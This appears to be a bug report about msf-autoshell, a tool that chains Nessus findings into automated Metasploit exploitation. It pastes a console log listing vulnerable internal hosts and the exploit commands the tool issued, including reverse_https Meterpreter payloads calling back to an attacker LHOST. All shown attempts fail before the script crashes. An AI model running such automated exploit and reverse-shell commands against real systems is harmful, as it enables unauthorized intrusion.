Hi,
msf-autoshell looks very interesting. Thank you for that!
However, I'm running into some problems that seems related to a session validation issue. I don't know if I missed something but here's the output of what I'm getting:
--
msf > python msf-autoshell.py -n /root/victim/nessus/victim_10_0_1_0.nessus
[*] exec: python msf-autoshell.py -n /root/victim/nessus/victim_10_0_1_0.nessus
[+] Found vulnerable host! 10.0.2.146:445 - MS15-078 Microsoft Windows Font Driver Buffer Overflow
[+] Found vulnerable host! 10.0.2.146:445 - MS15-078 Microsoft Windows Font Driver Buffer Overflow
[+] Found vulnerable host! 10.0.2.146:445 - Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability
[+] Found vulnerable host! 10.0.2.146:445 - Office OLE Multiple DLL Side Loading Vulnerabilities
[+] Found vulnerable host! 10.0.2.146:445 - Windows ClientCopyImage Win32k Exploit
[+] Found vulnerable host! 10.0.2.146:445 - Windows TrackPopupMenu Win32k NULL Pointer Dereference
[+] Found vulnerable host! 10.0.2.146:445 - Office OLE Multiple DLL Side Loading Vulnerabilities
[+] Found vulnerable host! 10.0.2.146:445 - LNK Code Execution Vulnerability
[+] Found vulnerable host! 10.0.2.146:445 - Windows Net-NTLMv2 Reflection DCOM/RPC
[+] Found vulnerable host! 10.0.2.146:445 - Office OLE Multiple DLL Side Loading Vulnerabilities
[+] Found vulnerable host! 10.0.2.146:445 - MS14-064 Microsoft Windows OLE Package Manager Code Execution
[+] Found vulnerable host! 10.0.2.146:445 - MS15-001 Microsoft Windows NtApphelpCacheControl Improper Authorization Check
[+] Found vulnerable host! 10.0.2.146:445 - Microsoft Windows Shell LNK Code Execution
[+] Found vulnerable host! 10.0.2.146:445 - Internet Explorer 11 VBScript Engine Memory Corruption
[+] Found vulnerable host! 10.0.2.146:445 - MS16-032 Secondary Logon Handle Privilege Escalation
[+] Found vulnerable host! 10.0.2.146:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.2.146:445 - MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
[+] Found vulnerable host! 10.0.2.146:445 - MS14-060 Microsoft Windows OLE Package Manager Code Execution
[+] Found vulnerable host! 10.0.2.143:445 - LNK Code Execution Vulnerability
[+] Found vulnerable host! 10.0.2.106:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.235:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.235:445 - Java Applet Reflection Type Confusion Remote Code Execution
[+] Found vulnerable host! 10.0.1.235:445 - Java storeImageArray() Invalid Array Indexing Vulnerability
[+] Found vulnerable host! 10.0.1.235:445 - Java Applet Method Handle Remote Code Execution
[+] Found vulnerable host! 10.0.1.235:445 - Java Applet JMX Remote Code Execution
[+] Found vulnerable host! 10.0.1.235:445 - Java Applet Field Bytecode Verifier Cache Remote Code Execution
[+] Found vulnerable host! 10.0.1.235:445 - Java CMM Remote Code Execution
[+] Found vulnerable host! 10.0.1.224:445 - Microsoft Office Word Malicious Hta Execution
[+] Found vulnerable host! 10.0.1.224:445 - LNK Code Execution Vulnerability
[+] Found vulnerable host! 10.0.1.224:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.224:445 - MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
[+] Found vulnerable host! 10.0.1.224:445 - Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability
[+] Found vulnerable host! 10.0.1.224:445 - Java Applet Reflection Type Confusion Remote Code Execution
[+] Found vulnerable host! 10.0.1.224:445 - Java storeImageArray() Invalid Array Indexing Vulnerability
[+] Found vulnerable host! 10.0.1.224:445 - Java AtomicReferenceArray Type Violation Vulnerability
[+] Found vulnerable host! 10.0.1.224:445 - Java Applet Method Handle Remote Code Execution
[+] Found vulnerable host! 10.0.1.224:445 - Java Applet JMX Remote Code Execution
[+] Found vulnerable host! 10.0.1.224:445 - Java Applet Field Bytecode Verifier Cache Remote Code Execution
[+] Found vulnerable host! 10.0.1.224:445 - Java CMM Remote Code Execution
[+] Found vulnerable host! 10.0.1.224:445 - Adobe Flash Player casi32 Integer Overflow
[+] Found vulnerable host! 10.0.1.224:445 - Adobe Flash Player ShaderJob Buffer Overflow
[+] Found vulnerable host! 10.0.1.224:445 - Adobe Flash Player ByteArray Use After Free
[+] Found vulnerable host! 10.0.1.224:445 - Adobe Flash Player Type Confusion Remote Code Execution
[+] Found vulnerable host! 10.0.1.224:445 - Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow
[+] Found vulnerable host! 10.0.1.224:445 - Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory
[+] Found vulnerable host! 10.0.1.224:445 - Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow
[+] Found vulnerable host! 10.0.1.224:445 - Adobe Flash Player NetConnection Type Confusion
[+] Found vulnerable host! 10.0.1.224:445 - Adobe Flash Player Drawing Fill Shader Memory Corruption
[+] Found vulnerable host! 10.0.1.224:445 - Adobe Flash Player copyPixelsToByteArray Method Integer Overflow
[+] Found vulnerable host! 10.0.1.185:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.167:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.164:443 - PHP CGI Argument Injection
[+] Found vulnerable host! 10.0.1.164:80 - PHP CGI Argument Injection
[+] Found vulnerable host! 10.0.1.164:443 - PHP CGI Argument Injection
[+] Found vulnerable host! 10.0.1.164:80 - PHP CGI Argument Injection
[+] Found vulnerable host! 10.0.1.157:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.157:445 - Java Applet Reflection Type Confusion Remote Code Execution
[+] Found vulnerable host! 10.0.1.157:445 - Java Applet JMX Remote Code Execution
[+] Found vulnerable host! 10.0.1.157:445 - Java storeImageArray() Invalid Array Indexing Vulnerability
[+] Found vulnerable host! 10.0.1.157:445 - Java CMM Remote Code Execution
[+] Found vulnerable host! 10.0.1.157:445 - Java Applet Method Handle Remote Code Execution
[+] Found vulnerable host! 10.0.1.157:445 - Java Applet JMX Remote Code Execution
[+] Found vulnerable host! 10.0.1.157:445 - Java Applet Field Bytecode Verifier Cache Remote Code Execution
[+] Found vulnerable host! 10.0.1.157:445 - Java 7 Applet Remote Code Execution
[+] Found vulnerable host! 10.0.1.150:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.146:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.146:445 - Macrovision InstallShield Update Service ActiveX Unsafe Method
[+] Found vulnerable host! 10.0.1.126:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.126:445 - Java Applet Reflection Type Confusion Remote Code Execution
[+] Found vulnerable host! 10.0.1.126:445 - Java Applet JMX Remote Code Execution
[+] Found vulnerable host! 10.0.1.126:445 - Java storeImageArray() Invalid Array Indexing Vulnerability
[+] Found vulnerable host! 10.0.1.126:445 - Java CMM Remote Code Execution
[+] Found vulnerable host! 10.0.1.126:445 - Java Applet Method Handle Remote Code Execution
[+] Found vulnerable host! 10.0.1.126:445 - Java Applet JMX Remote Code Execution
[+] Found vulnerable host! 10.0.1.126:445 - Java 7 Applet Remote Code Execution
[+] Found vulnerable host! 10.0.1.124:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.120:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.111:445 - Office OLE Multiple DLL Side Loading Vulnerabilities
[+] Found vulnerable host! 10.0.1.111:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.111:445 - Internet Explorer 11 VBScript Engine Memory Corruption
[+] Found vulnerable host! 10.0.1.111:445 - Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability
[+] Found vulnerable host! 10.0.1.105:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.92:445 - Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability
[+] Found vulnerable host! 10.0.1.92:445 - LNK Code Execution Vulnerability
[+] Found vulnerable host! 10.0.1.92:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.92:445 - MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
[+] Found vulnerable host! 10.0.1.90:445 - Microsoft Office CVE-2017-11882
[+] Found vulnerable host! 10.0.1.90:445 - Office OLE Multiple DLL Side Loading Vulnerabilities
[+] Found vulnerable host! 10.0.1.90:445 - Microsoft Office Word Malicious Hta Execution
[+] Found vulnerable host! 10.0.1.86:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.79:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.79:2049 - NFS Mount Scanner
[+] Found vulnerable host! 10.0.1.72:2049 - NFS Mount Scanner
[+] Found vulnerable host! 10.0.1.71:2049 - NFS Mount Scanner
[+] Found vulnerable host! 10.0.1.58:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[] Collecting list of all Metasploit modules...
[] Running MSF command:
search exploit/
[*] Running MSF command:
use exploit/windows/local/ms15_078_atmfd_bof
show targets
[] Setting options on exploit/windows/local/ms15_078_atmfd_bof
[] Running MSF command:
set target 0
set RHOSTS 10.0.2.146
set RPORT 445
set LHOST 10.0.2.159
set SRVHOST 10.0.2.159
set payload windows/x64/meterpreter/reverse_https
set ExitOnSession True
[*] Running MSF command:
exploit -z
[] exploit/windows/local/ms15_078_atmfd_bof output:
[-] Exploit failed: The following options failed to validate: SESSION.
[] Exploit completed, but no session was created.
[*] Running MSF command:
use exploit/windows/local/ms15_078_atmfd_bof
show targets
[] Setting options on exploit/windows/local/ms15_078_atmfd_bof
[] Running MSF command:
set target 0
set RHOSTS 10.0.2.146
set RPORT 445
set LHOST 10.0.2.159
set SRVHOST 10.0.2.159
set payload windows/x64/meterpreter/reverse_https
set ExitOnSession True
[*] Running MSF command:
exploit -z
[] exploit/windows/local/ms15_078_atmfd_bof output:
[-] Exploit failed: The following options failed to validate: SESSION.
[] Exploit completed, but no session was created.
[*] Running MSF command:
use exploit/windows/local/mov_ss
show targets
[] Setting options on exploit/windows/local/mov_ss
[] Running MSF command:
set target 0
set RHOSTS 10.0.2.146
set RPORT 445
set LHOST 10.0.2.159
set SRVHOST 10.0.2.159
set payload windows/x64/meterpreter/reverse_https
set ExitOnSession True
[*] Running MSF command:
exploit -z
[*] exploit/windows/local/mov_ss output:
[-] Exploit failed: The following options failed to validate: SESSION.
[*] Running MSF command:
use exploit/windows/fileformat/office_ole_multiple_dll_hijack
show targets
Traceback (most recent call last):
File "msf-autoshell.py", line 463, in
main()
File "msf-autoshell.py", line 457, in main
run_nessus_exploits(client, console_id, nes_exploits)
File "msf-autoshell.py", line 162, in run_nessus_exploits
module_output = run_msf_module(client, c_id, local_ip, ip, path, port, os_type)
File "msf-autoshell.py", line 271, in run_msf_module
cmd = create_msf_cmd(mod_path, rhost_var, ip, port, payload, target_num)
UnboundLocalError: local variable 'rhost_var' referenced before assignment
msf > sessions
Active sessions
No active sessions.
msf > jobs
Jobs
No active jobs.